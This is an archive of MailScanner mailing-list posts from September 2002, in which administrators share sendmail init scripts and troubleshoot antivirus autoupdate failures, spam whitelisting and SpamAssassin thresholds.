# Check that networking is up. > [ ${NETWORKING} = "no" ] && exit 0 > > [ -f /usr/local/MailScanner/bin/check_mailscanner ] || exit 0 > [ -f /usr/sbin/sendmail ] || exit 0 > > RETVAL=0 > > # See how we were called. > case "$1" in > start) > # Start daemons. > echo 'Starting MailScanner daemons:' > /usr/bin/newaliases > /dev/null 2>&1 > if test -x /usr/bin/make -a -f /etc/mail/Makefile ; then > make -C /etc/mail -q > else > for i in virtusertable access domaintable mailertable ; do > if [ -f /etc/mail/$i ] ; then > makemap hash /etc/mail/$i < /etc/mail/$i > fi > done > fi > echo -n ' incoming sendmail: ' > /usr/sbin/sendmail -bd -ODeliveryMode=queueonly \ > -OQueueDirectory=/var/spool/mqueue.in > success > echo > echo -n ' outgoing sendmail: ' > /usr/sbin/sendmail $([ -n "$QUEUETIME" ] && echo -q$QUEUETIME) > success > echo > echo -n ' MailScanner: ' > /usr/local/MailScanner/bin/check_mailscanner >/dev/null > RETVAL=$? > [ $RETVAL -eq 0 ] && touch /var/lock/subsys/mailscanner > success > echo > ;; > stop) > # Stop daemons. > echo 'Shutting down MailScanner daemons:' > echo -n ' MailScanner: ' > killproc mailscanner > echo > echo -n ' incoming sendmail: ' > killproc sendmail 2>/dev/null > echo > echo -n ' outgoing sendmail: ' > killproc /usr/sbin/sendmail 2>/dev/null > RETVAL=$? > echo > [ $RETVAL -eq 0 ] && rm -f /var/lock/subsys/mailscanner > ;; > status) > # Work out if all of MailScanner is running > echo 'Checking MailScanner daemons:' > echo -n ' MailScanner: ' > pid=`pidofproc mailscanner` > if [ -z "$pid" ] ; then failure; else success; fi > echo > # Now the incoming sendmail > echo -n ' incoming sendmail: ' > pid=`ps ax | grep 'sendmai[l]: accepting connections'` > if [ -z "$pid" ] ; then failure; else success; fi > echo > # Now the outgoing sendmail > echo -n ' outgoing sendmail: ' > # More complex regexp to handle other RedHats > pid=`ps ax | egrep '\[sendmail\]|sendmai[l] -q[0-9]*[mhd]'` > if [ -z "$pid" ] ; then failure; else success; fi > echo > ;; > restart|reload) > $0 stop > sleep 2 > $0 start > RETVAL=$? > ;; > *) > echo "Usage: mailscanner {start|stop|status|restart}" > exit 1 > esac > > > > Paul van Brouwershaven > > > -----Original Message----- > > From: MailScanner mailing list > [mailto:MAILSCANNER@JISCMAIL.AC.UK] On > > Behalf Of Mike Kercher > > Sent: Thursday, September 05, 2002 1:54 PM > > To: MAILSCANNER@JISCMAIL.AC.UK > > Subject: Re: A couple of questions > > > > > > One of the machines I have MS installed on is a RAQ too and > I also had > > > the problem of the init script not killing the mailscanner > process. I > > > had to modify the init script to kill 'perl' instead of > 'mailscanner'. > > > Luckily, I don't have any other perl processes running on > that box :) > > > I know it's not a clean fix, but it works. Below is the stop > > section from > > my init script. > > > > stop) > > # Stop daemons. > > echo 'Shutting down MailScanner daemons:' > > echo -n ' MailScanner: ' > > killproc perl > > echo > > echo -n ' incoming sendmail: ' > > killproc sendmail 2>/dev/null > > echo > > echo -n ' outgoing sendmail: ' > > killproc /usr/sbin/sendmail 2>/dev/null > > RETVAL=$? > > echo > > [ $RETVAL -eq 0 ] && rm -f /var/lock/subsys/mailscanner > > ;; > > > > Mike > > > > > > -----Original Message----- > > From: MailScanner mailing list > [mailto:MAILSCANNER@JISCMAIL.AC.UK] On > > Behalf Of craig > > > Sent: Thursday, September 05, 2002 4:39 AM > > To: MAILSCANNER@JISCMAIL.AC.UK > > Subject: Re: A couple of questions > > > > > > > >When does it use the > > > >Deleted Virus Message Report > > > >and > > > >Deleted Bad Filename reports ? > > > >when virus scanning ? > > > > > > If an attachment fails the filename checking, and the > attachment is > > > not being saved to disk (i.e. "Action = delete", then the > > badly-named > > > attachment will be replaced by the "Delete Bad Filename Report". > > > > Thnaks for that I found the problem I m using this on cobalt raq and > > seems that the init script does not kill mailscanner when you do a > > stop or restart it does that to sendmail process so this is > why when I > > > did the chnages to mailscanner.conf they did not show up > > > > I will check out that init script and find out why and let Mr Bassi > > know if its a bug > > > From Matthew_doherty at DATAWATCH.COM Thu Sep 5 14:25:03 2002 From: Matthew_doherty at DATAWATCH.COM (Matt Doherty) Date: Thu Jan 12 21:15:30 2006 Subject: Sophos autoupdate failing on install Message-ID: Heres a clip of what Julian Mentioned before about that issue.. [SNIP] At 13:39 05/08/2002, you wrote: >My Sophos 3.57 got out of date, so decided to install 3.59 and also >upgraded my Mailscanner to 3.22-10 Did you install Sophos 3.59 using my /usr/local/MailScanner/bin/Sophos.install script? >All works fine, but i get error when i'm trying to download ide files >using mailscanner's autoupdate for sophos {noticed that sophos don't >provide any update script with their virus scanner} > >Could not calculate Sophos version number, Bad file descriptor at >./autoupdate line 77. Delete everything under /usr/local/Sophos (except /usr/local/Sophos/bin/*) and install it using my Sophos.install script. That does an "autoupdate" as its last action. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ [SNIP] This worked for me. Matt Doherty IT Dept Datawatch Corp >>In a world without walls or fences, who needs Windows and Gates?<< -----Original Message----- From: S Mohan [mailto:smohan@VSNL.COM] Sent: Thursday, September 05, 2002 8:11 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: Sophos autoupdate failing on install I had the same problem. I deleted /usr/local/Sophos directory and ran /usr/local/MailScanner/Sophos.install from the directory where the tar.gz file from Sophos was downloaded. This is install script installs Sophos in the right location and also runs the autoupdate which goes thro' fine. Thought I've not looked at the reasons due to lack of time, I know it works. I also know that if I install Sophos where it is supposed to be installed by hand, autoupdate fails in line 77. HTH Mohan -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of Chris Waltham Sent: 05 September 2002 15:12 To: MAILSCANNER@JISCMAIL.AC.UK Subject: Sophos autoupdate failing on install Hi guys, I'm having a few dramas getting Sophos' autoupdate to run when I'm installing it. I've checked the directory names specified in the autoupdate script, but to no avail. When I run the autoupdate file by hand, I get this (it's the same error as upon the initial install): root@xxx:/usr/local/sophos/bin# ./autoupdate Lynx failed with error return 1 , Bad file descriptor at ./autoupdate line 77. Any ideas? thanks again, Chris -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020905/d5cf8eea/attachment.html From sevans at FOUNDATION.SDSU.EDU Thu Sep 5 15:58:17 2002 From: sevans at FOUNDATION.SDSU.EDU (Steve Evans) Date: Thu Jan 12 21:15:30 2006 Subject: SpamAssassin 2.31 and Razor 2.14 Message-ID: <6214C3F9233D764C9E7029396C355015331447@mail.foundation.sdsu.edu> SA 2.40 (which was released on Monday) supports Razor 2. Steve Evans (619) 594-0653 -----Original Message----- From: Andy Humberston [mailto:iah@DMU.AC.UK] Sent: Thursday, September 05, 2002 4:19 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: SpamAssassin 2.31 and Razor 2.14 I think I have solved this, SA only currently detects Razor1. Razor2 detectection has been developed, but as yet hasn't been released. I have installed Razor-1.20 Andy From LISTSERV at JISCMAIL.AC.UK Thu Sep 5 15:29:05 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:30 2006 Subject: MAILSCANNER: thom@DARKSABER.COM left the list Message-ID: <200209051429.PAA01537@magpie.ecs.soton.ac.uk> Thu, 5 Sep 2002 15:29:05 thom@DARKSABER.COM has just signed off the MAILSCANNER list (MailScanner mailing list). ------------------------- Original mail header -------------------------- Return-Path: Received: from 130.246.192.52 by JISCMAIL.AC.UK (SMTPL release 1.0f) with TCP; Thu, 5 Sep 2002 15:29:05 +0100 Received: from ns.darksaber.com ([209.47.7.19]) by ori.rl.ac.uk (8.11.1/8.11.1) with ESMTP id g85ET3r12492 for ; Thu, 5 Sep 2002 15:29:03 +0100 Received: from zeus.ac-services.ca ([209.47.7.21]) by ns.darksaber.com (8.11.6/8.11.6) with ESMTP id g85ET3Q31343 for ; Thu, 5 Sep 2002 10:29:03 -0400 Subject: Re: unsubscribe From: Thom Paine To: L-Soft list server "at JISCMAIL (1.8e)" In-Reply-To: <200209051426.g85EQlQ29428@ns.darksaber.com> References: <200209051426.g85EQlQ29428@ns.darksaber.com> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.3 (1.0.3-6) Date: 05 Sep 2002 14:29:01 -0400 Message-Id: <1031250543.1305.8.camel@service.darksaber.com> Mime-Version: 1.0 From LISTSERV at JISCMAIL.AC.UK Thu Sep 5 15:40:46 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:30 2006 Subject: MAILSCANNER: tjfs@TADPOLE.CO.UK requested to join Message-ID: <200209051440.PAA02995@magpie.ecs.soton.ac.uk> Thu, 5 Sep 2002 15:40:46 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Tim Steele . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER tjfs@TADPOLE.CO.UK Tim Steele The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+tjfs%40TADPOLE.CO.UK+Tim+Steele&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From mailscanner at ecs.soton.ac.uk Thu Sep 5 17:48:30 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:30 2006 Subject: mcafee autoupdate skript In-Reply-To: Message-ID: <5.1.0.14.2.20020905174808.02d411c0@imap.ecs.soton.ac.uk> Are you behing a web cache or proxy that you need to configure into the autoupdate script? At 10:05 05/09/2002, you wrote: >Hello all! > >I get an error when executing the MailScanner mcafee update skript >(autoupdate). > > >The error is: >"McAfee update failed: cannot find the update file, at ./autoupdate line >93." > >I checked the name of the available updatefile at: >ftp.nai.com/pub/antivirus/datfiles/4.x/ > >it`s: "dat-4221.tar" > >The script is looking for an file described by this line: >" if ($file =~ /dat-.*\.tar/){" > >know I? m unsure whether the expression is wrong or if how to alter it. >Thanks for any ideas. > >-- > >Stephan Zeisler >_____________________________________________ >MINDLAB GmbH > >Marktplatz 19 >73728 Esslingen (Neckar) >GERMANY > >Tel.: +49-(0)-711-36550-105 >Fax.: +49-(0)-711-36550-555 > >e-mail: stephan.zeisler@mindlab.de >Internet: http://www.mindlab.de > http://mindlab-webmining.com >_____________________________________________ > >MINDLAB --- access your knowledge -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Thu Sep 5 17:49:58 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:30 2006 Subject: Whitelist problem In-Reply-To: <200209051827400860.07BA1263@smtp1.ace.net.au> References: <5.1.0.14.2.20020905091944.05bb3768@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020904072843.03a03ea0@imap.ecs.soton.ac.uk> <00ab01c253a1$60965460$370410ac@ns.uu.net> <5.1.0.14.2.20020905091944.05bb3768@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020905174853.0889beb0@imap.ecs.soton.ac.uk> At 09:57 05/09/2002, you wrote: >I added "From: newscomment@newsjpmsn.com" to spam.whitelist.conf yet >the following header still gets caught as spam. > >It happens with some others also, what am I doing wrong? The thing you need to whitelist is the address in the line starting "S", not in the line starting "H??From:". It's the envelope that matters, not whatever they chose to put in the headers. So I would whitelist From: mailerror.melma.com in this case. >Peter > >---------- > >$_smtp5.melma.com [203.174.71.94] >$rSMTP >$ssmtp5.melma.com >${daemon_flags} >${if_addr}203.87.115.13 >S >RPFD: >H?P?Return-Path: >H??Received: from smtp5.melma.com (smtp5.melma.com [203.174.71.94]) > by dns4.ace.net.au (8.11.6/8.11.6) with SMTP id g858eaC27343 > for ; Thu, 5 Sep 2002 18:10:37 +0930 >H??Received: (qmail 69623 invoked by uid 0); 5 Sep 2002 17:36:25 +0900 >H??Received: from unknown (HELO send2.data-hotel.net) (10.0.15.164) > by 0 with SMTP; 5 Sep 2002 17:36:25 +0900 >H??Date: Thu, 5 Sep 2002 17:35:52 +0900 >H??From: MSN JOURNAL >H??To: user@ace.net.au >H??Subject: [MSN =?ISO-2022-JP?B?GyRCJTglYyE8JUolaxsoQg==?= SELECT >2002.09.05] >H??Mime-Version: 1.0 >H??Message-Id: <190.64086.send2@melma.com> >H??Content-Type: text/plain; charset=iso-2022-jp >H??Content-Transfer-Encoding: 7bit >H??X-MagazineID: melma.com magazine 394 >H??X-Mailer: melma.com 3.1 >H??Errors-To: magusererror-394-user=ace.net.au@mailerror.melma.com >. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From craig at WEBFARM.CO.NZ Fri Sep 6 01:18:20 2002 From: craig at WEBFARM.CO.NZ (Craig St George) Date: Thu Jan 12 21:15:30 2006 Subject: killproc mailscanner In-Reply-To: References: <005201c254d2$e79e1ec0$6501a8c0@mikedesk> Message-ID: <5.1.0.14.2.20020906121538.0452e8d0@192.168.0.88> Ok it is defiantly a cobalt RAQ thing when you ue init script and then do a ps awx it shows perl /home/opt/MailScanner/bin/mailscanner /home/opt/ so killproc mail scanner does not work nor does status I just changed init script so to kill via the PID # Stop daemons. echo 'Shutting down MailScanner daemons:' [ -f /home/opt/MailScanner/var/virus.pid ] && { kill `cat /home/opt/MailScanner/var/virus.pid` echo -n ' MailScanner: ' } rm -f /home/opt/MailScanner/var/virus.pid echo and status # Work out if all of MailScanner is running echo 'Checking MailScanner daemons:' echo -n ' MailScanner: ' pid=`ps ax |grep '/home/opt/MailScanner'` if [ -z "$pid" ] ; then failure; else success; fi echo From mike at CAMAROSS.NET Fri Sep 6 01:26:22 2002 From: mike at CAMAROSS.NET (Mike Kercher) Date: Thu Jan 12 21:15:30 2006 Subject: killproc mailscanner In-Reply-To: <5.1.0.14.2.20020906121538.0452e8d0@192.168.0.88> Message-ID: Actually, I think it's an older version of Redhat thing. I installed MS on a friend's RH 6.1 box today and ran into the same thing. Luckily, he'll be upgrading in another week or so! :) -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of Craig St George Sent: Thursday, September 05, 2002 7:18 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: killproc mailscanner Ok it is defiantly a cobalt RAQ thing when you ue init script and then do a ps awx it shows perl /home/opt/MailScanner/bin/mailscanner /home/opt/ so killproc mail scanner does not work nor does status I just changed init script so to kill via the PID # Stop daemons. echo 'Shutting down MailScanner daemons:' [ -f /home/opt/MailScanner/var/virus.pid ] && { kill `cat /home/opt/MailScanner/var/virus.pid` echo -n ' MailScanner: ' } rm -f /home/opt/MailScanner/var/virus.pid echo and status # Work out if all of MailScanner is running echo 'Checking MailScanner daemons:' echo -n ' MailScanner: ' pid=`ps ax |grep '/home/opt/MailScanner'` if [ -z "$pid" ] ; then failure; else success; fi echo From steve at BASSI.COM Fri Sep 6 06:24:52 2002 From: steve at BASSI.COM (Steve Bassi) Date: Thu Jan 12 21:15:30 2006 Subject: killproc mailscanner References: <005201c254d2$e79e1ec0$6501a8c0@mikedesk> <5.1.0.14.2.20020906121538.0452e8d0@192.168.0.88> Message-ID: <002901c25565$bb1182a0$02fea8c0@lilbess> ----- Original Message ----- From: "Craig St George" To: Sent: Friday, September 06, 2002 1:18 AM Subject: killproc mailscanner > Ok it is defiantly a cobalt RAQ thing > > when you ue init script and then do a ps awx > it shows > perl /home/opt/MailScanner/bin/mailscanner /home/opt/ > > so killproc mail scanner does not work nor does status > > I just changed init script so to kill via the PID > > > # Stop daemons. > echo 'Shutting down MailScanner daemons:' > > [ -f /home/opt/MailScanner/var/virus.pid ] && { > kill `cat /home/opt/MailScanner/var/virus.pid` > echo -n ' MailScanner: ' > } > rm -f /home/opt/MailScanner/var/virus.pid > echo > > > > and status > > > # Work out if all of MailScanner is running > echo 'Checking MailScanner daemons:' > echo -n ' MailScanner: ' > pid=`ps ax |grep '/home/opt/MailScanner'` > if [ -z "$pid" ] ; then failure; else success; fi > echo > > That did not seem to solve it completely for me on my RAQ, so this is what I did. I am sure there is a better and neater way .. but hey it works for me. Rgds Steve Bassi stop) # Stop daemons. echo 'Shutting down MailScanner daemons:' [ -f /home/opt/MailScanner/var/virus.pid ] && { kill -1 `cat /home/opt/MailScanner/var/virus.pid` } rm -f /home/opt/MailScanner/var/virus.pid echo -n ' MailScanner: ' pid=`ps -axww | grep "/MailScanner" | grep -v "grep" | head -1 | awk {'print $1'}`; if [ -z "$pid" ] ; then success; else failure; fi echo echo -n ' incoming sendmail: ' killproc sendmail 2>/dev/null echo echo -n ' outgoing sendmail: ' killproc /usr/sbin/sendmail 2>/dev/null RETVAL=$? echo [ $RETVAL -eq 0 ] && rm -f /var/lock/subsys/mailscanner ;; status) # Work out if all of MailScanner is running echo 'Checking MailScanner daemons:' echo -n ' MailScanner: ' pid=`ps -axww | grep "/MailScanner" | grep -v "grep" | head -1 | awk {'print $1'}`; if [ -z "$pid" ] ; then failure; else success; fi echo # Now the incoming sendmail echo -n ' incoming sendmail: ' pid=`ps ax | grep 'sendmai[l]: accepting connections'` if [ -z "$pid" ] ; then failure; else success; fi echo # Now the outgoing sendmail echo -n ' outgoing sendmail: ' # More complex regexp to handle other RedHats pid=`ps ax | egrep '\[sendmail\]|sendmai[l] -q[0-9]*[mhd]'` if [ -z "$pid" ] ; then failure; else success; fi echo ;; From danieltan at shopnsave.com.sg Fri Sep 6 07:18:28 2002 From: danieltan at shopnsave.com.sg (Daniel Tan) Date: Thu Jan 12 21:15:30 2006 Subject: mailscanner not scanning Message-ID: <01b601c2556d$3a0caa60$3900a8c0@Daniel> Hi there, i have a question regarding the incoming queue dir and outgoing queue dir. this is my mail server setup if email send from client's machine, email will goto /var/spool/mqueue.in then if email address belongs to local domain, email will be sent locally to /var/spool/mail if not email will be sent to my ISP smtp server to be forwarded to the appropriate server. so my mailscanner.conf files contains - incoming queue dir /var/spool/mqueue.in - outgoing queue dir /var/spool/mqueue previously my sendmail was sending mails through /var/spool/mqueue before i changed it to /var/spool/mqueue.in to accomdate mailscanner but once i try sending an email with attachment eicar.txt or eicar.com (virus file), the file passes through without clearing the virus. what is the most likely problem? what are the things to check? i am using sophos anti-virus at the moment. i even tried using sophos with all the available options to scan the user's mailbox but it can't clean the attachment (/var/spool/mail/username) Regards, Daniel Tan 67469188 Ext.665 DID: 68430665 MIS Department Shop N Save Pte Ltd : danieltan@shopnsave.com.sg [This e-mail is confidential and may also be privileged. If you are not the intended recipient, please delete it and notify us immediately; you should not copy or use it for any purpose, nor disclose its contents to any other person. Thank you.] From mailscanner at ecs.soton.ac.uk Fri Sep 6 07:50:16 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:30 2006 Subject: mailscanner not scanning In-Reply-To: <01b601c2556d$3a0caa60$3900a8c0@Daniel> Message-ID: <5.1.0.14.2.20020906074726.05558de8@imap.ecs.soton.ac.uk> You have got your init.d script wrong by the looks of it. You should have 1 copy of sendmail running just queueing into /var/spool/mqueue.in (-bd but no -q, and the couple of options required to set "queueonly" and "/var/spool/mqueue.in". And you should have 1 copy of sendmail running just delivery from /var/spool/mqueue (so a -q15m but no -bd). If the MailScanner process itself is not running, you should just see mail accumulate in /var/spool/mqueue.in. It should *not* be delivered, just gradually collect there. Once you start up the MailScanner process (using check_mailscanner) that will disinfect the messages and move them into /var/spool/mqueue, at which point the 2nd sendmail process will deliver them. At 07:18 06/09/2002, you wrote: >Hi there, > i have a question regarding the incoming queue dir and outgoing >queue dir. >this is my mail server setup >if email send from client's machine, email will goto /var/spool/mqueue.in >then if email address belongs to local domain, email will be sent locally to >/var/spool/mail >if not email will be sent to my ISP smtp server to be forwarded to the >appropriate server. >so my mailscanner.conf files contains - incoming queue dir >/var/spool/mqueue.in > - outgoing queue dir >/var/spool/mqueue >previously my sendmail was sending mails through /var/spool/mqueue before i >changed it to /var/spool/mqueue.in to accomdate mailscanner > >but once i try sending an email with attachment eicar.txt or eicar.com >(virus file), the file passes through without clearing the virus. what is >the most likely problem? what are the things to check? i am using sophos >anti-virus at the moment. >i even tried using sophos with all the available options to scan the user's >mailbox but it can't clean the attachment (/var/spool/mail/username) > >Regards, >Daniel Tan >67469188 Ext.665 >DID: 68430665 >MIS Department >Shop N Save Pte Ltd >: danieltan@shopnsave.com.sg > >[This e-mail is confidential and may also be privileged. If you are not the >intended recipient, please delete it and notify us immediately; you should >not copy or use it for any purpose, nor disclose its contents to any other >person. Thank you.] -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From s.zeisler at MINDLAB.DE Fri Sep 6 08:57:05 2002 From: s.zeisler at MINDLAB.DE (Stephan Zeisler) Date: Thu Jan 12 21:15:30 2006 Subject: mcafee autoupdate skript In-Reply-To: <5.1.0.14.2.20020905174808.02d411c0@imap.ecs.soton.ac.uk> Message-ID: On Thu, 5 Sep 2002, Julian Field wrote: No. It?s just a "normal" Firewall. No caching, no proxy facilities. Any other ideas? Anyone else having similar problems with the auotupdate skript for mcafee? Stephan Zeisler > Are you behing a web cache or proxy that you need to configure into the > autoupdate script? > > At 10:05 05/09/2002, you wrote: > >Hello all! > > > >I get an error when executing the MailScanner mcafee update skript > >(autoupdate). > > > > > >The error is: > >"McAfee update failed: cannot find the update file, at ./autoupdate line > >93." > > > >I checked the name of the available updatefile at: > >ftp.nai.com/pub/antivirus/datfiles/4.x/ > > > >it`s: "dat-4221.tar" > > > >The script is looking for an file described by this line: > >" if ($file =~ /dat-.*\.tar/){" > > > >Now I? m unsure whether the expression is wrong or if how to alter it. > >Thanks for any ideas. Stephan Zeisler _____________________________________________ MINDLAB GmbH Marktplatz 19 73728 Esslingen (Neckar) GERMANY Tel. +49-(0)-711-36550-105 Fax. +49-(0)-711-36550-555 e-mail: stephan.zeisler@mindlab.de Internet: http://www.mindlab.de _____________________________________________ MINDLAB --- access your knowledge From Q.G.Campbell at NEWCASTLE.AC.UK Fri Sep 6 09:06:01 2002 From: Q.G.Campbell at NEWCASTLE.AC.UK (Quentin Campbell) Date: Thu Jan 12 21:15:30 2006 Subject: The delete or tag dilemma Message-ID: We take the view at this site that there is more danger in missing an important e-mail than in getting spam. As we have not yet been able to eliminate false positives from our spam scanning (with SpamAssassin) we simply tag spam at our Mail Hubs and leave it to users to deal with the tagged messages. Even so a user may still miss an important message because it was a "false positive" and was buried amongst genuine spam in the spam folder. Are there any sites out there that are automatically deleting spam with a very high score but delivering as tagged mail spam that falls below that threshold but is above the "normal" spam threshold (usually 5 to 9)? If they are doing this, can they describe how? I recall some discussion about this on the list but cannot find the message(s) in question. Thanks Quentin From mailscanner at ecs.soton.ac.uk Fri Sep 6 09:44:36 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:30 2006 Subject: The delete or tag dilemma In-Reply-To: Message-ID: <5.1.0.14.2.20020906094415.02d6b0a8@imap.ecs.soton.ac.uk> Read http://www.sng.ecs.soton.ac.uk/mailscanner/install/conf.shtml and look for the word "High". Should be enough to get you started, I hope. At 09:06 06/09/2002, you wrote: >We take the view at this site that there is more danger in missing an >important e-mail than in getting spam. > >As we have not yet been able to eliminate false positives from our spam >scanning (with SpamAssassin) we simply tag spam at our Mail Hubs and >leave it to users to deal with the tagged messages. Even so a user may >still miss an important message because it was a "false positive" and >was buried amongst genuine spam in the spam folder. > >Are there any sites out there that are automatically deleting spam with >a very high score but delivering as tagged mail spam that falls below >that threshold but is above the "normal" spam threshold (usually 5 to >9)? > >If they are doing this, can they describe how? I recall some discussion >about this on the list but cannot find the message(s) in question. > >Thanks > >Quentin -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From Q.G.Campbell at NEWCASTLE.AC.UK Fri Sep 6 10:01:02 2002 From: Q.G.Campbell at NEWCASTLE.AC.UK (Quentin Campbell) Date: Thu Jan 12 21:15:30 2006 Subject: The delete or tag dilemma Message-ID: > -----Original Message----- > From: Julian Field [mailto:mailscanner@ecs.soton.ac.uk] > Sent: 06 September 2002 09:45 > To: MAILSCANNER@JISCMAIL.AC.UK > Subject: Re: The delete or tag dilemma > > > Read http://www.sng.ecs.soton.ac.uk/mailscanner/install/conf.shtml > and look for the word "High". > Should be enough to get you started, I hope. Julian That looks like the facility I need. However I am still running with 3.20-7 so have even more incentive to upgrade! Thanks Quentin --- PHONE: +44 191 222 8209 Computing Service, University of Newcastle FAX: +44 191 222 8765 Newcastle upon Tyne, United Kingdom, NE1 7RU. ------------------------------------------------------------------------ "Any opinion expressed above is mine. The University can get its own." From iah at DMU.AC.UK Fri Sep 6 10:31:22 2002 From: iah at DMU.AC.UK (Andy Humberston) Date: Thu Jan 12 21:15:30 2006 Subject: Maps-RBL+ question Message-ID: Hi, I have recently installed and successfully configured MailScanner, along with SA and very impressed I am too. The question I have is: Within the MailScanner config I have enabled maps-rbl+ to point to rbl-plus.mail-abuse.ja.net this was previously checked from within Sendmail. Am I correct in thinking that my MTA will now pass messages from maps-rbl+ listed hosts, but tag them as {SPAM?} - If this is the case would I not be better performing the check within sendmail, thus reducing the number of messages being sent to my users. Andy Humberston Team Leader - Server Support Team Information Services and Systems De Montfort University HelpDesk: 0116 250 6050 Fax: 0116 257 7658 -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020906/602a7f4f/attachment.html From LISTSERV at JISCMAIL.AC.UK Fri Sep 6 10:24:21 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:30 2006 Subject: MAILSCANNER: tjfs@TADPOLE.CO.UK left the list Message-ID: <200209060924.KAA10332@magpie.ecs.soton.ac.uk> Fri, 6 Sep 2002 10:24:21 Tim Steele has just signed off the MAILSCANNER list (MailScanner mailing list). ------------------------- Original mail header -------------------------- Return-Path: Received: from 130.246.192.52 by JISCMAIL.AC.UK (SMTPL release 1.0f) with TCP; Fri, 6 Sep 2002 10:24:18 +0100 Received: from gemini.tadpole.co.uk ([160.104.128.16]) by ori.rl.ac.uk (8.11.1/8.11.1) with ESMTP id g869OIr20067 for ; Fri, 6 Sep 2002 10:24:18 +0100 Received: from PCTJFS (dhcp-206.dhcp.tadpole.co.uk [160.104.131.206]) by gemini.tadpole.co.uk (8.12.4/8.12.4) with SMTP id g869NRY8027555 for ; Fri, 6 Sep 2002 10:23:30 +0100 (BST) Message-ID: <001801c25587$0e9ef6c0$ce8368a0@PCTJFS> From: "Tim Steele" To: Subject: Date: Fri, 6 Sep 2002 10:23:24 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 X-MailScanner: Found to be clean X-MailScanner-SpamCheck: not spam (whitelisted), SpamAssassin (score=1, required 4, SUBJ_MISSING, AWL) From x.mailscanner.mail at MELLONI.COM Fri Sep 6 14:37:49 2002 From: x.mailscanner.mail at MELLONI.COM (Bruno Melloni) Date: Thu Jan 12 21:15:30 2006 Subject: Skilled spammers Message-ID: <200209061337.g86Dbor25703@ori.rl.ac.uk> MailScanner + SpamAssassin is very effective at blocking my spam (I use the SA default of 5 rather than the recommended 9 - I pretty much don't get false positives so 5 is fine for me). But even with such a tight level of control there is a small number (bellnexia, junum, qves, equalamail, specialfunoffers, kali) of frequent-spammers that tweak their junk in a way that they usually get tagged below 5 (typically around 4.6). These spammers also heavily fake their header information, so that blacklisting them took several tries and I ended up having to do it by blocking their subnets. What(where?) is the best way to report these spammers so that they will be intercepted by future Mailscanner and SpamAssassin releases? Bruno From mike at CAMAROSS.NET Fri Sep 6 14:56:56 2002 From: mike at CAMAROSS.NET (Mike Kercher) Date: Thu Jan 12 21:15:30 2006 Subject: Skilled spammers In-Reply-To: <200209061337.g86Dbor25703@ori.rl.ac.uk> Message-ID: Are you using any of the dnsbl's? I use spamcop, osirusoft and ordb and very few sneak through. I use the dns zones at the MTA and not in SA/MS Mike -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of Bruno Melloni Sent: Friday, September 06, 2002 8:38 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Skilled spammers MailScanner + SpamAssassin is very effective at blocking my spam (I use the SA default of 5 rather than the recommended 9 - I pretty much don't get false positives so 5 is fine for me). But even with such a tight level of control there is a small number (bellnexia, junum, qves, equalamail, specialfunoffers, kali) of frequent-spammers that tweak their junk in a way that they usually get tagged below 5 (typically around 4.6). These spammers also heavily fake their header information, so that blacklisting them took several tries and I ended up having to do it by blocking their subnets. What(where?) is the best way to report these spammers so that they will be intercepted by future Mailscanner and SpamAssassin releases? Bruno From thomas_duvally at BROWN.EDU Fri Sep 6 15:28:50 2002 From: thomas_duvally at BROWN.EDU (Thomas DuVally) Date: Thu Jan 12 21:15:30 2006 Subject: Skilled spammers In-Reply-To: References: Message-ID: <1031322530.1635.17.camel@toms> On Fri, 2002-09-06 at 09:56, Mike Kercher wrote: > Are you using any of the dnsbl's? I use spamcop, osirusoft and ordb and very few sneak through. I use the dns zones at the MTA and > not in SA/MS > 